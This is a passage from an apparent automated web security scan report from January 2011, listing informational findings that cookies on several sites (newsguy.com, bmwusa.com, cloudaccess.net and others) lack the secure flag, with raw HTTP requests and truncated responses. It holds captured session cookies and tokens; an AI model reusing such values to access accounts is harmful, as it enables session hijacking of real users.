GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

8.13. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

8.14. https://acc.newsguy.com/user/accnt_signup_usenet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

8.15. https://acc.newsguy.com/user/accnt_upgrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_upgrade

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

8.16. https://github.com/DataSift/TweetMeme-Chrome-Extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/DataSift/TweetMeme-Chrome-Extension

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:00:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "ed993b0b64e19e7dbc6254707982dc48"
X-Runtime: 124ms
Content-Length: 40811
Set-Cookie: csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
Set-Cookie: _gh_sess=BAh7BzoRbG9jYWxlX2d1ZXNzIgdlbiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--e0bd7516c66d61afc1315d8c70aa3e9910534a77; path=/; expires=Fri, 01 Jan 2021 00:00:00 GMT; secure; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

8.17. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

8.18. https://sell.autotrader.com/syc/syc_center.jsf/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sell.autotrader.com
Path:	/syc/syc_center.jsf/x22

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServersell=1753538570.47140.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /syc/syc_center.jsf/x22 HTTP/1.1
Host: sell.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:24 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServersell=1753538570.47140.0000; path=/
Keep-Alive: timeout=30
Content-Length: 216

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /syc/syc_center.jsf/x22 was not found on this server.<P>
...[SNIP]...

8.19. https://www.bmwusa.com/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=UhmMf4pGAIGE3YTDimr5qpIoTBHmwhxAYkpY6FXQZsjsK8I-ZqVjCRQO3df8XUyuJtngRgB9HKWNLzF6c_n7ziqREw1V-qezTqpq1_AxFS77UoW0uG3VZ2TJGKX1-La1VBhilu45gcGoEftXkrZcay97fFto7jDpifD5PYt_8VVwD_IM9POySKnOwhgQCQ-GwEjTWvZM7u62v46uYW3ihZtKSsU1&t=3a010726 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:24 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/
Content-Length: 6794

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.DropShadowBehavior = function(element) {
AjaxControlToolkit.DropShadowBehavior.initializeBase(this, [element]);this._opacity = 1.0;t
...[SNIP]...

8.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fNaN&Scheme=http HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 231
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:15 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSecured%2fContent%2fForms%2fLogin.aspx%3fenc%3dmwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK">h
...[SNIP]...

8.21. https://www.bmwusa.com/Secured/NaN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:14 GMT
Connection: keep-alive
Set-Cookie: WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

8.22. https://www.bmwusa.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=8vmmyJUcpAfwePI_vHjEZZzhNQ4xywI20eg8QPHXCFBLoYaZ-iotmrKPGOJcOPcKed2_9fi23ApLsbhQEjklRH9c1X-oNneXtDyJTnRsg1VCv4iu3joe2IkWTU-4dZUwd23uy7A-b_tZvv0ORXw7vC3BngAxxyWWKj2hWy2J5tMQ-eZXm9EI_5o6ZyuhxuFVQyt7rw2&t=634188751465741492 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 38101
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 25 Jan 2011 15:19:30 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/

var __aspxInvalidDimension=-10000;var __aspxInvalidPosition=-10000;var __aspxAbsoluteLeftPosition=-10000;var __aspxAbsoluteRightPosition=10000;var __aspxMenuZIndex=20000;var __aspxPopupControlZIndex=1
...[SNIP]...

8.23. https://www.bmwusa.com/jsenvconst.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:20 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/
Content-Length: 637

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

8.24. https://www.cloudaccess.net/copyright-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 16:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

8.25. https://www.cloudaccess.net/network-report.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/network-report.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /network-report.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:44 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:44 GMT; path=/
